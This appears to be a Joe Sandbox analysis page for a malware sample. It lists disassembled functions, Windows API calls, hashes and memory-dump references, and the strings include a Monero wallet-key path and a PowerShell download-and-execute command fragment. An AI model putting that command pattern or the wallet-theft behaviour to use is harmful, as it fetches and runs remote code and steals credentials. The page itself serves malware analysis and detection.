Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: >=`$>=`
API String ID: 1378416451-1645853530
Opcode ID: 0fb1ce2317aeeb7ec6ea803787731ee7db86420994bf79d237bc248e4f81ce83
Instruction ID: 8992fc3321f4883e80034d56875a60d883cddb27b2fcfbbfc0d8eb62b043d37c
Opcode Fuzzy Hash: 0fb1ce2317aeeb7ec6ea803787731ee7db86420994bf79d237bc248e4f81ce83
Instruction Fuzzy Hash: 64F01939E44208ABDB14DFB0EC49F9A77BABB48710F108654FA11A62C0D67096018F90

Function 005FA110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005FA13C
GetFileSizeEx.KERNEL32(000000FF,?), ref: 005FA161
LocalAlloc.KERNEL32(00000040,?), ref: 005FA181
ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005FA1AA
LocalFree.KERNEL32(005F148F), ref: 005FA1E0
CloseHandle.KERNEL32(000000FF), ref: 005FA1EA

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: a7b6705f5bee6e87cd63b15c554f7b3251112d69ca664237e6a8bc0116bfb531
Instruction ID: e19b28398001f80bcddf068fbb973ae517e9d4c2edb1ac34e7b9ef618f2334ad
Opcode Fuzzy Hash: a7b6705f5bee6e87cd63b15c554f7b3251112d69ca664237e6a8bc0116bfb531
Instruction Fuzzy Hash: 8031E1B4A00209EFDB14DF94D885FEE7BB5BF48304F108159E915A7290D774AA85CFA2

Function 006049D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00F4F3C8), ref: 00604A2B

Part of subcall function 00608F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608F9B

lstrcat.KERNEL32(?,00000000), ref: 00604A51
lstrcat.KERNEL32(?,?), ref: 00604A70
lstrcat.KERNEL32(?,?), ref: 00604A84
lstrcat.KERNEL32(?,00F3A680), ref: 00604A97
lstrcat.KERNEL32(?,?), ref: 00604AAB
lstrcat.KERNEL32(?,00F4E0C8), ref: 00604ABF

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 00608F20: GetFileAttributesA.KERNEL32(00000000,?,005F1B94,?,?,0061577C,?,?,00610E22), ref: 00608F2F

Part of subcall function 006047C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006047D0
Part of subcall function 006047C0: RtlAllocateHeap.NTDLL(00000000), ref: 006047D7
Part of subcall function 006047C0: wsprintfA.USER32 ref: 006047F6
Part of subcall function 006047C0: FindFirstFileA.KERNEL32(?,?), ref: 0060480D

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 4e1ad7cb621044d40ad8fd5b3bd5b217c9ff0d574543e8db063c0c22bd0cf4b5
Instruction ID: c75fbb6ddc88738067b3c3b6b7902fdd9f47794d7127a79d5a473c3cb7000901
Opcode Fuzzy Hash: 4e1ad7cb621044d40ad8fd5b3bd5b217c9ff0d574543e8db063c0c22bd0cf4b5
Instruction Fuzzy Hash: 1B3144B29402186BDB58F7B0DC95EDE733DBB48700F404599B24656091EF749BC8CF98

Function 00602EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

ShellExecuteEx.SHELL32(0000003C), ref: 00602FD5

Strings

')", xrefs: 00602F03
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00602F14
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00602F54
<, xrefs: 00602F89

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 4034e1b486864ccbcedca73f7f61d32f06a51d1577e04f3d8698940271c0bcb8
Instruction ID: a7397b9fddd876d7b60976d5483c10be86b3aff2d344ccff37899e8fcf5473a3
Opcode Fuzzy Hash: 4034e1b486864ccbcedca73f7f61d32f06a51d1577e04f3d8698940271c0bcb8
Instruction Fuzzy Hash: 2241CF719502089ADB58FBE0C8A1FEEB77AAF14340F40455DE116671D2EF702A89CF55

Function 00604300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,00F4E048,00000000,00020119,?), ref: 00604344
RegQueryValueExA.ADVAPI32(?,00F4F488,00000000,00000000,00000000,000000FF), ref: 00604368
RegCloseKey.ADVAPI32(?), ref: 00604372
lstrcat.KERNEL32(?,00000000), ref: 00604397
lstrcat.KERNEL32(?,00F4F578), ref: 006043AB

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: d8c263627aa7a80fd33eaa0203c2bccf9f16f0189d0a110eee919ef4f50c9033
Instruction ID: 494c448e2c0439e5a38dbf8569f500565a8366f65d72d7f971976cd2ae128c82
Opcode Fuzzy Hash: d8c263627aa7a80fd33eaa0203c2bccf9f16f0189d0a110eee919ef4f50c9033
Instruction Fuzzy Hash: 5A4196B6940108ABDB28EBA0EC46FFE773DBB88300F40455CB716561C1FE759A888F95

Function 0066CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 0066CC1F
dllmain_crt_dispatch.LIBCMT ref: 0066CC36
dllmain_raw.LIBCMT ref: 0066CC7E
dllmain_crt_dispatch.LIBCMT ref: 0066CC91
dllmain_raw.LIBCMT ref: 0066CCA4

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
Instruction ID: d2a0dfcb1a18c57b98a26d780770aba0b69d0807710152dd91fdc225cade96fa
Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
Instruction Fuzzy Hash: A6218B72D40A18ABDB219F59CC419BF3A7AEB81BB0B054119F88867210C2318D419BE0

Function 00606BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00606C0C
sscanf.NTDLL ref: 00606C39
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00606C52
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00606C60
ExitProcess.KERNEL32 ref: 00606C7A

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: dc3a35b14ac3452c10eeaffbfc006fd48e9e60101140a6f96e634f3953f3fee3
Instruction ID: 416d6f5220c01c8a46339287d0c1a23e12f6ef032ff0ab61524e625bed69a757
Opcode Fuzzy Hash: dc3a35b14ac3452c10eeaffbfc006fd48e9e60101140a6f96e634f3953f3fee3
Instruction Fuzzy Hash: 2E21CD75D142089BCF48EFE4E8459EEB7B6FF48300F04856EF516A3250EB749608CB69

Function 00607F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607FC7
RtlAllocateHeap.NTDLL(00000000), ref: 00607FCE
RegOpenKeyExA.ADVAPI32(80000002,00F3BBF8,00000000,00020119,?), ref: 00607FEE
RegQueryValueExA.ADVAPI32(?,00F4E108,00000000,00000000,000000FF,000000FF), ref: 0060800F
RegCloseKey.ADVAPI32(?), ref: 00608022

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 358d186360ab2525515f9e8870dc76999c789ed1347700f971b904cfd16f0b4c
Instruction ID: ebdab5066de0bc617249c7ba274d00f1cdf0fc6623a7e8201819e33a63e165ab
Opcode Fuzzy Hash: 358d186360ab2525515f9e8870dc76999c789ed1347700f971b904cfd16f0b4c
Instruction Fuzzy Hash: 48114CB1A84205AFEB04CF94DD45FAFBBBDFB44B10F104219F616A7280D7B559048BA1

Function 006093F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(00F4F4A0,00000000,00000000,?,005F9F71,00000000,00F4F4A0,00000000), ref: 006093FC
lstrcpyn.KERNEL32(008C7580,00F4F4A0,00F4F4A0,?,005F9F71,00000000,00F4F4A0), ref: 00609420
lstrlen.KERNEL32(00000000,?,005F9F71,00000000,00F4F4A0), ref: 00609437
wsprintfA.USER32 ref: 00609457

Strings

%s%s, xrefs: 00609445

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 24abfbefae7df90dc33da50aea6acf63e83aa8a0a28d60bb6aba05287c6963d6
Instruction ID: f46ffb9c6bbc8c772fff1a17ef0775cad326d929630b5e4b557649c58216eaf0
Opcode Fuzzy Hash: 24abfbefae7df90dc33da50aea6acf63e83aa8a0a28d60bb6aba05287c6963d6
Instruction Fuzzy Hash: 4F01CC75544108FFDB04DFA8D944EAE7BB9FB48304F148248F9199B245D631EA54DF90

Function 005F12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F12B4
RtlAllocateHeap.NTDLL(00000000), ref: 005F12BB
RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005F12D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005F12F5
RegCloseKey.ADVAPI32(?), ref: 005F12FF

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 2373e750d7d535e0ff5de07f1147cf6b8ae73a153f83c584ec8c79ae43f91500
Instruction ID: 02d02f07230af6e60ca86fdd5d028f8032c39bb1ed5b68776b916ed98f0575da
Opcode Fuzzy Hash: 2373e750d7d535e0ff5de07f1147cf6b8ae73a153f83c584ec8c79ae43f91500
Instruction Fuzzy Hash: 2F01CDB9A44209BFDB04DFD4DC49FAE777CBB48701F108195FA1597280D6749A008F90

Function 0060CB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtGetStringTypeA.LIBCMT ref: 0060CC1C
___crtLCMapStringA.LIBCMT ref: 0060CC3C
___crtLCMapStringA.LIBCMT ref: 0060CC61

Strings

, xrefs: 0060CBC6

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Type
String ID:
API String ID: 2109742289-3916222277
Opcode ID: 3bb85b5bf91467850977f9e064204344e256193311104bac4111c0a2d9539c79
